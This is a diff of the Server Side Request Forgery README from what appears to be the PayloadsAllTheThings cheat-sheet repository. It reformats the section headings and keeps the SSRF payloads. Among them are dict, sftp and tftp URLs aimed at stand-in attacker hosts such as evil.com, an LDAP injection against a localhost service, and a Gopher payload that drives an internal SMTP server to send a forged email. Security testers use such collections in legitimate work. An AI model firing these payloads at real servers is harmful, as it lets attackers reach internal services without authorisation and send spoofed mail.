swisskyrepo/PayloadsAllTheThings/Server Side Request Forgery/README.md

 The following URL scheme can be used to probe the network

+### Dict

-Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:

 ```powershell
 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
 ssrf.php?url=dict://attacker:11111/
 ```

+### SFTP

-Sftp : a network protocol used for secure file transfer over secure shell
+A network protocol used for secure file transfer over secure shell

 ```powershell
 ssrf.php?url=sftp://evil.com:11111/
 ```

+### TFTP

-Tftp : Trivial File Transfer Protocol, works over UDP
+Trivial File Transfer Protocol, works over UDP

 ```powershell
 ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
 ```

+### LDAP

-Ldap : Lightweight Directory Access Protocol.
+Lightweight Directory Access Protocol.
 It is an application protocol used over an IP network to manage and access the distributed directory information service.

 ```powershell
 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 ```

-Gopher
+### Gopher

 ```powershell
 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a